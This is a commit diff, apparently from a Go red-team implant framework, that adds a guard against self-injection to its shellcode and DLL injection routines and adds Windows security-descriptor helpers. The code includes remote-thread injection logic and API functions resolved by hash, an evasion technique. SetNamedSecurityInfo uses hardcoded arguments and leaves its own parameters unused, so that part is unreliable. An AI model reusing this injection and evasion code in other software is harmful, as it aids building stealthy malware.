Bug Fixes

- Exported the named security function calls.
- Added methods to get attributes from Security Descriptor.
- Fixed a bug in sentinel.py regarding encrypting output.
- Added a property to DLL and ASM to guard aganist direct self injection without directly specifying.
- Fixed a Sentinel bug that erronously split command lines
- Shortened sentinel back-off time.

Author: iDigitalFlame

cmd/asm.go

@@ -32,9 +32,10 @@ import (
 //
 // TODO(dij): Add Linux shellcode execution support.
 type Assembly struct {
-	Data    []byte
-	t       thread
-	Timeout time.Duration
+	Data        []byte
+	t           thread
+	Timeout     time.Duration
+	SameProcess bool
 }
 
 // Run will start the Assembly thread and wait until it completes. This function

cmd/asm_windows.go

@@ -41,7 +41,7 @@ func (a *Assembly) Start() error {
 	if len(a.Data) == 0 {
 		return ErrEmptyCommand
 	}
-	if err := a.t.Start(0, a.Timeout, 0, a.Data); err != nil {
+	if err := a.t.Start(0, a.Timeout, 0, a.Data, a.SameProcess); err != nil {
 		return err
 	}
 	go a.t.wait(0, 0)

cmd/dll.go

@@ -28,9 +28,10 @@ import (
 // The 'SetParent*' function will attempt to set the target that loads the DLL.
 // If none are specified, the DLL will be loaded into the current process.
 type DLL struct {
-	Path    string
-	t       thread
-	Timeout time.Duration
+	Path        string
+	t           thread
+	Timeout     time.Duration
+	SameProcess bool
 }
 
 // Run will start the DLL thread and wait until it completes. This function

cmd/dll_windows.go

@@ -56,7 +56,7 @@ func (d *DLL) Start() error {
 	for i := 0; i < len(b)-1; i += 2 {
 		b[i], b[i+1] = byte(p[i/2]), byte(p[i/2]>>8)
 	}
-	if err := d.t.Start(0, d.Timeout, winapi.LoadLibraryAddress(), b); err != nil {
+	if err := d.t.Start(0, d.Timeout, winapi.LoadLibraryAddress(), b, d.SameProcess); err != nil {
 		return err
 	}
 	b = nil

cmd/thread_windows.go

@@ -57,9 +57,11 @@ func (t *thread) close() {
 	if t.callback != nil {
 		t.callback()
 	} else {
-		// NOTE(dij): We only need to close the owner if there is no callback as
-		//            it's usually a Zombie that'll handle it's own handle closure.
-		winapi.CloseHandle(t.owner)
+		if t.owner != 0 && t.owner != winapi.CurrentProcess {
+			// NOTE(dij): We only need to close the owner if there is no callback as
+			//            it's usually a Zombie that'll handle it's own handle closure.
+			winapi.CloseHandle(t.owner)
+		}
 	}
 	winapi.CloseHandle(t.hwnd)
 	t.hwnd, t.owner, t.loc = 0, 0, 0
@@ -261,7 +263,7 @@ func (t *thread) waitInner(x chan<- error, p, i uint32) {
 	x <- e
 	close(x)
 }
-func (t *thread) Start(p uintptr, d time.Duration, a uintptr, b []byte) error {
+func (t *thread) Start(p uintptr, d time.Duration, a uintptr, b []byte, same bool) error {
 	if t.Running() {
 		return ErrAlreadyStarted
 	}
@@ -278,6 +280,9 @@ func (t *thread) Start(p uintptr, d time.Duration, a uintptr, b []byte) error {
 	}
 	atomic.StoreUint32(&t.cookie, 0)
 	if t.ch, t.owner = make(chan struct{}), p; t.owner == 0 {
+		if !same {
+			return t.stopWith(exitStopped, ErrNotSame)
+		}
 		t.owner = winapi.CurrentProcess
 	}
 	var err error
@@ -292,6 +297,12 @@ func (t *thread) Start(p uintptr, d time.Duration, a uintptr, b []byte) error {
 		if t.owner, err = t.filter.HandleFunc(0x43A, nil); err != nil {
 			return t.stopWith(exitStopped, err)
 		}
+		if !same {
+			if i, _ := winapi.GetProcessID(t.owner); i == winapi.GetCurrentProcessID() {
+				winapi.CloseHandle(t.owner)
+				return t.stopWith(exitStopped, ErrNotSame)
+			}
+		}
 	}
 	// 0x20 - PAGE_EXECUTE_READ
 	z := uint32(0x20)
@@ -316,6 +327,9 @@ func (t *thread) Start(p uintptr, d time.Duration, a uintptr, b []byte) error {
 		}
 	}
 	if t.owner == winapi.CurrentProcess || t.owner == 0 {
+		if !same {
+			return t.stopWith(exitStopped, ErrNotSame)
+		}
 		// 0x4 - PAGE_READWRITE
 		if t.loc, err = winapi.NtAllocateVirtualMemory(t.owner, uint32(l), 0x4); err != nil {
 			return t.stopWith(exitStopped, err)

cmd/util.go

@@ -23,6 +23,12 @@ import (
 )
 
 var (
+	// ErrNotSame is an error returned by the 'Start' or 'Run' functions when
+	// attempting to start a ASM or DLL without a Filter target and not setting
+	// the 'SelfProcess' attribute to 'true',
+	//
+	// This is used to prevent accidental self-injection
+	ErrNotSame = xerr.Sub("cannot host new thread", 0x80)
 	// ErrNotStarted is an error returned by multiple functions when attempting
 	// to access a Runnable function that requires the Runnable to be started first.
 	ErrNotStarted = xerr.Sub("process has not started", 0x3A)

cmd/zombie_windows.go

@@ -55,7 +55,7 @@ func (z *Zombie) Start() error {
 	if err := z.x.start(z.ctx, &z.Process, true); err != nil {
 		return z.stopWith(exitStopped, err)
 	}
-	if err := z.t.Start(z.x.i.Process, z.Timeout, 0, z.Data); err != nil {
+	if err := z.t.Start(z.x.i.Process, z.Timeout, 0, z.Data, true); err != nil {
 		return z.stopWith(exitStopped, z.t.stopWith(exitStopped, err))
 	}
 	go z.wait()

device/winapi/calls.go

@@ -1067,6 +1067,27 @@ func RegSetValueEx(h uintptr, path string, t uint32, data *byte, dataLen uint32)
 	return nil
 }
 
+// GetNamedSecurityInfo Windows API Call
+//
+//	The GetNamedSecurityInfo function retrieves a copy of the security descriptor
+//	for an object specified by name.
+//
+// https://learn.microsoft.com/en-us/windows/win32/api/aclapi/nf-aclapi-getnamedsecurityinfow
+func GetNamedSecurityInfo(path string, object, info uint32) (*SecurityDescriptor, error) {
+	n, err := UTF16PtrFromString(path)
+	if err != nil {
+		return nil, err
+	}
+	var s *SecurityDescriptor
+	r, _, err1 := syscallN(funcGetNamedSecurityInfo.address(), uintptr(unsafe.Pointer(n)), uintptr(object), uintptr(info), 0, 0, 0, 0, uintptr(unsafe.Pointer(&s)))
+	if r > 0 {
+		return nil, unboxError(err1)
+	}
+	c := s.copyRelative()
+	localFree(uintptr(unsafe.Pointer(s)))
+	return c, nil
+}
+
 // CreateEvent Windows API Call
 //
 //	Creates or opens a named or unnamed event object.
@@ -1223,6 +1244,29 @@ func InitiateSystemShutdownEx(t, msg string, secs uint32, force, reboot bool, re
 	return nil
 }
 
+// SetNamedSecurityInfo Windows API Call
+//
+//	The SetNamedSecurityInfo function sets specified security information in the
+//	security descriptor of a specified object. The caller identifies the object by name.
+//
+// https://learn.microsoft.com/en-us/windows/win32/api/aclapi/nf-aclapi-setnamedsecurityinfow
+func SetNamedSecurityInfo(path string, object, info uint32, owner, group *SID, dacl, sacl *ACL) error {
+	n, err := UTF16PtrFromString(path)
+	if err != nil {
+		return err
+	}
+	/*r, _, err1 := syscallN(
+		funcSetNamedSecurityInfo.address(), uintptr(unsafe.Pointer(n)), uintptr(object), uintptr(info),
+		uintptr(unsafe.Pointer(owner)), uintptr(unsafe.Pointer(group)), uintptr(unsafe.Pointer(dacl)), uintptr(unsafe.Pointer(sacl)),
+	)*/
+	r, err1 := funcSetNamedSecurityInfo.Call(uintptr(unsafe.Pointer(n)), 1, 0x80000004, 0, 0, uintptr(unsafe.Pointer(dacl)), 0)
+	if r > 0 {
+		return err1
+		//return unboxError(err1)
+	}
+	return nil
+}
+
 // NtCreateSection Windows API Call
 //
 //	The NtCreateSection routine creates a section object.

device/winapi/structs.go

@@ -471,10 +471,12 @@ type ProcessInformation struct {
 //
 // DO NOT REORDER
 type SecurityDescriptor struct {
-	_, _ byte
-	_    SecurityDescriptorControl
-	_, _ SID
-	_, _ *ACL
+	_, _    byte
+	Control SecurityDescriptorControl
+	owner   *SID
+	group   *SID
+	sacl    *ACL
+	dacl    *ACL
 }
 
 // SecurityAttributes matches the SECURITY_ATTRIBUTES struct
@@ -575,6 +577,62 @@ func localFree(h uintptr) (uintptr, error) {
 	}
 	return r, nil
 }
+
+// Dacl attempts to retrieve the DACL of this SecurityDescriptor. The returned ACL
+// may be nil if no DACL was present.
+func (s *SecurityDescriptor) Dacl() (*ACL, error) {
+	var (
+		e, d bool
+		a    *ACL
+	)
+	r, _, _ := syscallN(funcRtlGetDaclSecurityDescriptor.address(), uintptr(unsafe.Pointer(s)), uintptr(unsafe.Pointer(&e)), uintptr(unsafe.Pointer(&a)), uintptr(unsafe.Pointer(&d)))
+	if r > 0 {
+		return nil, formatNtError(r)
+	}
+	return a, nil
+}
+
+// Sacl attempts to retrieve the SACL of this SecurityDescriptor. The returned ACL
+// may be nil if no SACL was present.
+func (s *SecurityDescriptor) Sacl() (*ACL, error) {
+	var (
+		e, d bool
+		a    *ACL
+	)
+	r, _, _ := syscallN(funcRtlGetSaclSecurityDescriptor.address(), uintptr(unsafe.Pointer(s)), uintptr(unsafe.Pointer(&e)), uintptr(unsafe.Pointer(&a)), uintptr(unsafe.Pointer(&d)))
+	if r > 0 {
+		return nil, formatNtError(r)
+	}
+	return a, nil
+}
+
+// Owner attempts to retrieve the SID of the Owner of this SecurityDescriptor. The
+// returned SID may be nil if no Owner was present.
+func (s *SecurityDescriptor) Owner() (*SID, error) {
+	var (
+		d bool
+		v *SID
+	)
+	r, _, _ := syscallN(funcRtlGetOwnerSecurityDescriptor.address(), uintptr(unsafe.Pointer(s)), uintptr(unsafe.Pointer(&v)), uintptr(unsafe.Pointer(&d)))
+	if r > 0 {
+		return nil, formatNtError(r)
+	}
+	return v, nil
+}
+
+// Group attempts to retrieve the SID of the Group of this SecurityDescriptor. The
+// returned SID may be nil if no Group was present.
+func (s *SecurityDescriptor) Group() (*SID, error) {
+	var (
+		d bool
+		v *SID
+	)
+	r, _, _ := syscallN(funcRtlGetGroupSecurityDescriptor.address(), uintptr(unsafe.Pointer(s)), uintptr(unsafe.Pointer(&v)), uintptr(unsafe.Pointer(&d)))
+	if r > 0 {
+		return nil, formatNtError(r)
+	}
+	return v, nil
+}
 func convertSIDToStringSID(i *SID, s **uint16) error {
 	r, _, err := syscallN(funcConvertSIDToStringSID.address(), uintptr(unsafe.Pointer(i)), uintptr(unsafe.Pointer(s)))
 	if r == 0 {

device/winapi/xy_procs_crypt.go

@@ -35,57 +35,61 @@ var (
 	funcLoadLibraryEx = dllKernelBase.Proc(0x68D28778)
 	funcFormatMessage = dllKernelBase.Proc(0x8233A148)
 
-	funcNtClose                     = dllNtdll.sysProc(0x36291E41)
-	funcNtSetEvent                  = dllNtdll.sysProc(0x5E5D5E5B)
-	funcRtlFreeHeap                 = dllNtdll.Proc(0xBC880A2D)
-	funcNtTraceEvent                = dllNtdll.sysProc(0x89F984CE)
-	funcNtOpenThread                = dllNtdll.sysProc(0x7319665F)
-	funcRtlCreateHeap               = dllNtdll.Proc(0xA1846AB)
-	funcEtwEventWrite               = dllNtdll.Proc(0xD32A6690) // >= WinVista
-	funcDbgBreakPoint               = dllNtdll.Proc(0x6861210F)
-	funcNtOpenProcess               = dllNtdll.sysProc(0x57367582)
-	funcRtlDestroyHeap              = dllNtdll.Proc(0x167E8613)
-	funcNtResumeThread              = dllNtdll.sysProc(0xA6F798EA)
-	funcNtCreateSection             = dllNtdll.sysProc(0x40A2511C)
-	funcNtSuspendThread             = dllNtdll.sysProc(0x9D419019)
-	funcNtResumeProcess             = dllNtdll.sysProc(0xB5333DBD)
-	funcRtlAllocateHeap             = dllNtdll.Proc(0x50AA445E)
-	funcNtDuplicateToken            = dllNtdll.sysProc(0x7A75D3A1)
-	funcEtwEventRegister            = dllNtdll.Proc(0xC0B4D94C) // >= WinVista
-	funcNtSuspendProcess            = dllNtdll.sysProc(0x8BD95BF8)
-	funcNtCreateThreadEx            = dllNtdll.sysProc(0x8E6261C)  // >= WinVista (Xp sub = RtlCreateUserThread)
-	funcNtCancelIoFileEx            = dllNtdll.sysProc(0xD4909C18) // >= WinVista (Xp sub = NtCancelIoFile)
-	funcNtDuplicateObject           = dllNtdll.sysProc(0xAD2BC047)
-	funcNtTerminateThread           = dllNtdll.sysProc(0x18157A24)
-	funcNtOpenThreadToken           = dllNtdll.sysProc(0x82EEAAFE)
-	funcEtwEventWriteFull           = dllNtdll.Proc(0xAC8A097) // >= WinVista
-	funcRtlReAllocateHeap           = dllNtdll.Proc(0xA51D1975)
-	funcNtMapViewOfSection          = dllNtdll.sysProc(0x704A2F2C)
-	funcNtTerminateProcess          = dllNtdll.sysProc(0xB3AC5173)
-	funcNtOpenProcessToken          = dllNtdll.sysProc(0xB2CA3641)
-	funcRtlCopyMappedMemory         = dllNtdll.Proc(0x381752E6) // >= WinS2003 (Not in XP sub = RtlMoveMemory)
-	funcNtFreeVirtualMemory         = dllNtdll.sysProc(0x8C399853)
-	funcNtImpersonateThread         = dllNtdll.sysProc(0x12724B12)
-	funcNtUnmapViewOfSection        = dllNtdll.sysProc(0x19B022D)
-	funcNtWriteVirtualMemory        = dllNtdll.sysProc(0x2012F428)
-	funcNtDeviceIoControlFile       = dllNtdll.sysProc(0x5D0C9026)
-	funcNtWaitForSingleObject       = dllNtdll.sysProc(0x46D9033C)
-	funcNtSetInformationToken       = dllNtdll.sysProc(0x43623A4)
-	funcNtProtectVirtualMemory      = dllNtdll.sysProc(0xD86AFCB8)
-	funcNtSetInformationThread      = dllNtdll.sysProc(0x5F74B08D)
-	funcRtlGetNtVersionNumbers      = dllNtdll.Proc(0xD476F98B)
-	funcEtwNotificationRegister     = dllNtdll.Proc(0x7B7F821F) // >= WinVista
-	funcNtAllocateVirtualMemory     = dllNtdll.sysProc(0x46D22D36)
-	funcRtlSetProcessIsCritical     = dllNtdll.Proc(0xEE7639E9)
-	funcNtFlushInstructionCache     = dllNtdll.sysProc(0xEFB80179)
-	funcNtAdjustTokenPrivileges     = dllNtdll.sysProc(0x6CCF6931)
-	funcNtQueryInformationToken     = dllNtdll.sysProc(0x63C176C4)
-	funcNtQueryInformationThread    = dllNtdll.sysProc(0x115412D)
-	funcNtQuerySystemInformation    = dllNtdll.sysProc(0x337C7C64)
-	funcNtWaitForMultipleObjects    = dllNtdll.sysProc(0x5DF74043)
-	funcNtQueryInformationProcess   = dllNtdll.sysProc(0xC88AB8C)
-	funcRtlWow64GetProcessMachines  = dllNtdll.Proc(0x982D219D) // == 64bit/ARM64
-	funcRtlLengthSecurityDescriptor = dllNtdll.Proc(0xF5677F7C)
+	funcNtClose                       = dllNtdll.sysProc(0x36291E41)
+	funcNtSetEvent                    = dllNtdll.sysProc(0x5E5D5E5B)
+	funcRtlFreeHeap                   = dllNtdll.Proc(0xBC880A2D)
+	funcNtTraceEvent                  = dllNtdll.sysProc(0x89F984CE)
+	funcNtOpenThread                  = dllNtdll.sysProc(0x7319665F)
+	funcRtlCreateHeap                 = dllNtdll.Proc(0xA1846AB)
+	funcEtwEventWrite                 = dllNtdll.Proc(0xD32A6690) // >= WinVista
+	funcDbgBreakPoint                 = dllNtdll.Proc(0x6861210F)
+	funcNtOpenProcess                 = dllNtdll.sysProc(0x57367582)
+	funcRtlDestroyHeap                = dllNtdll.Proc(0x167E8613)
+	funcNtResumeThread                = dllNtdll.sysProc(0xA6F798EA)
+	funcNtCreateSection               = dllNtdll.sysProc(0x40A2511C)
+	funcNtSuspendThread               = dllNtdll.sysProc(0x9D419019)
+	funcNtResumeProcess               = dllNtdll.sysProc(0xB5333DBD)
+	funcRtlAllocateHeap               = dllNtdll.Proc(0x50AA445E)
+	funcNtDuplicateToken              = dllNtdll.sysProc(0x7A75D3A1)
+	funcEtwEventRegister              = dllNtdll.Proc(0xC0B4D94C) // >= WinVista
+	funcNtSuspendProcess              = dllNtdll.sysProc(0x8BD95BF8)
+	funcNtCreateThreadEx              = dllNtdll.sysProc(0x8E6261C)  // >= WinVista (Xp sub = RtlCreateUserThread)
+	funcNtCancelIoFileEx              = dllNtdll.sysProc(0xD4909C18) // >= WinVista (Xp sub = NtCancelIoFile)
+	funcNtDuplicateObject             = dllNtdll.sysProc(0xAD2BC047)
+	funcNtTerminateThread             = dllNtdll.sysProc(0x18157A24)
+	funcNtOpenThreadToken             = dllNtdll.sysProc(0x82EEAAFE)
+	funcEtwEventWriteFull             = dllNtdll.Proc(0xAC8A097) // >= WinVista
+	funcRtlReAllocateHeap             = dllNtdll.Proc(0xA51D1975)
+	funcNtMapViewOfSection            = dllNtdll.sysProc(0x704A2F2C)
+	funcNtTerminateProcess            = dllNtdll.sysProc(0xB3AC5173)
+	funcNtOpenProcessToken            = dllNtdll.sysProc(0xB2CA3641)
+	funcRtlCopyMappedMemory           = dllNtdll.Proc(0x381752E6) // >= WinS2003 (Not in XP sub = RtlMoveMemory)
+	funcNtFreeVirtualMemory           = dllNtdll.sysProc(0x8C399853)
+	funcNtImpersonateThread           = dllNtdll.sysProc(0x12724B12)
+	funcNtUnmapViewOfSection          = dllNtdll.sysProc(0x19B022D)
+	funcNtWriteVirtualMemory          = dllNtdll.sysProc(0x2012F428)
+	funcNtDeviceIoControlFile         = dllNtdll.sysProc(0x5D0C9026)
+	funcNtWaitForSingleObject         = dllNtdll.sysProc(0x46D9033C)
+	funcNtSetInformationToken         = dllNtdll.sysProc(0x43623A4)
+	funcNtProtectVirtualMemory        = dllNtdll.sysProc(0xD86AFCB8)
+	funcNtSetInformationThread        = dllNtdll.sysProc(0x5F74B08D)
+	funcRtlGetNtVersionNumbers        = dllNtdll.Proc(0xD476F98B)
+	funcEtwNotificationRegister       = dllNtdll.Proc(0x7B7F821F) // >= WinVista
+	funcNtAllocateVirtualMemory       = dllNtdll.sysProc(0x46D22D36)
+	funcRtlSetProcessIsCritical       = dllNtdll.Proc(0xEE7639E9)
+	funcNtFlushInstructionCache       = dllNtdll.sysProc(0xEFB80179)
+	funcNtAdjustTokenPrivileges       = dllNtdll.sysProc(0x6CCF6931)
+	funcNtQueryInformationToken       = dllNtdll.sysProc(0x63C176C4)
+	funcNtQueryInformationThread      = dllNtdll.sysProc(0x115412D)
+	funcNtQuerySystemInformation      = dllNtdll.sysProc(0x337C7C64)
+	funcNtWaitForMultipleObjects      = dllNtdll.sysProc(0x5DF74043)
+	funcNtQueryInformationProcess     = dllNtdll.sysProc(0xC88AB8C)
+	funcRtlWow64GetProcessMachines    = dllNtdll.Proc(0x982D219D) // == 64bit/ARM64
+	funcRtlLengthSecurityDescriptor   = dllNtdll.Proc(0xF5677F7C)
+	funcRtlGetDaclSecurityDescriptor  = dllNtdll.Proc(0x13464D36)
+	funcRtlGetSaclSecurityDescriptor  = dllNtdll.Proc(0xE72F0F6F)
+	funcRtlGetGroupSecurityDescriptor = dllNtdll.Proc(0xD1F4CD59)
+	funcRtlGetOwnerSecurityDescriptor = dllNtdll.Proc(0xB5D71CF9)
 
 	funcReadFile                  = dllKernelBase.Proc(0xEBE8E9AF)
 	funcWriteFile                 = dllKernelBase.Proc(0x567775AC)
@@ -132,6 +136,8 @@ var (
 	funcRegCreateKeyEx                                      = dllAdvapi32.Proc(0xA656F848)
 	funcSetServiceStatus                                    = dllAdvapi32.Proc(0xC09B613A)
 	funcLookupAccountSid                                    = dllAdvapi32.Proc(0x59E27333)
+	funcGetNamedSecurityInfo                                = dllAdvapi32.Proc(0x411B68C7)
+	funcSetNamedSecurityInfo                                = dllAdvapi32.Proc(0xFA5B67F3)
 	funcLookupPrivilegeValue                                = dllAdvapi32.Proc(0xEC6FF8D6)
 	funcConvertSIDToStringSID                               = dllAdvapi32.Proc(0x7AAB722D)
 	funcCreateProcessWithToken                              = dllAdvapi32.Proc(0xC20739FE) // >= WinS2003 (Not in XP)